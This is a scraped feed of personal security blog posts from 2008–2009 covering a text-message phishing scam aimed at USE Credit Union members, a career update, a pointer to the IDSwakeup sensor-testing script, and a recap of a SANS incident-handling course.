Hopefully everyone will be more prepared for what's next.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-63647663175595593972009-02-28T23:35:00.000-05:002009-03-01T00:04:54.487-05:00Phishing for USE Credit Union Members<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCzb8MZwQJYljuChPSa6zoLpHegAjL5c5CVESZDVUPBhk7Bnh31gFtddULTlVp_BWwxOtwOJsxcPwmLI-cTJbITmX7kqIOl5Glh5uJfSObZSIheLkrJs_KuIRcuaBwcawfnZqw3Z98JKz9/s1600-h/Phone.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCzb8MZwQJYljuChPSa6zoLpHegAjL5c5CVESZDVUPBhk7Bnh31gFtddULTlVp_BWwxOtwOJsxcPwmLI-cTJbITmX7kqIOl5Glh5uJfSObZSIheLkrJs_KuIRcuaBwcawfnZqw3Z98JKz9/s320/Phone.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5308074442855645330" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilcZdjkTNRzxfWdAb4iY599LUP_qDjuYZSxqaSjh_Z6KEIKjHGdeK52izKhUI9SrgBDwN9Rd5WlkwxbXkIVZZitSmvizToHrrj0OJfzEJxPvbkG7CD-Nu2ZXIccu6CvXGL3YJkF5vJbbIw/s1600-h/Site.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilcZdjkTNRzxfWdAb4iY599LUP_qDjuYZSxqaSjh_Z6KEIKjHGdeK52izKhUI9SrgBDwN9Rd5WlkwxbXkIVZZitSmvizToHrrj0OJfzEJxPvbkG7CD-Nu2ZXIccu6CvXGL3YJkF5vJbbIw/s320/Site.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5308075404209083410" /></a><br />As promised, here is my next post already. It couldn't have been 30 minutes ago that I promised I would keep them coming. This post involves cell phone phishing scams. Lately I've received text messages from what appears to be USE Credit Union. 
<br /><br />The text message alerts the recipient to "Unauthorized Identity Access" and then directs them to a fraudulent website that requires entry of credit/debit card information. Textbook: no SSL connection, privacy warnings displayed in the browser, etc.<br />Viewing the source of the page revealed a well-commented application for customized credit card theft...<br /><br />This time it was phishing; next time it could easily be a targeted attack with malicious code dropping a back door.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-73086086689718017532009-02-28T22:59:00.000-05:002009-02-28T23:15:37.050-05:00Its been a whole yearI've got to post more often... It was never my intention to do a post a year, LoL. It's been an interesting year and I have encountered many new, exciting challenges in my career in Information Security. I have added the interest and responsibilities of managing enterprise-level security to my daily concerns. Just a year ago, exploits, malware, firewall rule sets and IPS tuning dominated my duties. Now I've added metrics, dashboards, Average Loss Expectancies, risk assessments and regulatory requirements. I guess I'll count it as gaining maturity as a security professional. With that said, there is no excuse... Not only do I need to post more often, it now seems to be a psychological necessity... <br /><br /><br />More to comeCourt Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-66215853171841317412008-01-30T01:35:00.000-05:002008-01-30T01:52:06.907-05:00Testing your IDSIs that SPAN still up? Am I seeing the traffic that I need to? <a href="http://www.hsc.fr/ressources/outils/idswakeup/index.html.en">IDSwakeup</a> from Herve Schauer Consultants is a small script that is worth a try. 
You will have to have hping2 installed as a prerequisite.<br /><br /> Usage: ./IDSwakeup src_addr dst_addr [nb] [ttl]<br /><br />IDSwakeup should light the average sensor up like an Xmas tree.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-71224067954304743282008-01-26T20:00:00.001-05:002008-12-11T03:50:15.820-05:00Sans New Orleans 2008<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAEniQCmbBp6Ui1-EGu8SMGcrSPSay76q9ybW3Ei4I6XWBhN7xjeIINGc9_hrPgHUXjvUOX4MCgS1m8ETX5NetFXT1nB7g8Mrezb6npeZw8VyDZtEN9RJiTdMIzGKlxn03aGYYOWTtvH1b/s1600-h/IMG00109.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAEniQCmbBp6Ui1-EGu8SMGcrSPSay76q9ybW3Ei4I6XWBhN7xjeIINGc9_hrPgHUXjvUOX4MCgS1m8ETX5NetFXT1nB7g8Mrezb6npeZw8VyDZtEN9RJiTdMIzGKlxn03aGYYOWTtvH1b/s320/IMG00109.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5159959975772235394" /></a><br /><br /><br />Last week, I attended the latest SANS Institute conference in New Orleans. All in all it was a great experience. It seems like the city is on its way back. I sat through SEC-504 Advanced Hacker Techniques and Incident Handling, and yes, I'll be taking the exam for the cert. The course was originally scheduled to be taught by the one and only Ed Skoudis, known for the books he has authored, including "Counterhack" and "Counterhack Reloaded". Upon arrival, I was disappointed to find out that Ed would not be teaching, but a guy by the name of John Strand; Ed was in the lab working on what has become the new SANS Penetration Testing / Ethical Hacking course. Well, no need to worry: John did not disappoint. I listened to him vomit knowledge for 6 days, eight hours each day, non-stop. 
My hat is off to all of the SANS instructors; they are hands down the most professional and knowledgeable in the field. Check out <a href="http://www.john-strand.com">John Strand's website</a>; he has some pretty good video tutorials on it.<br /><br />Thank you New Orleans <br />Love that City!Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0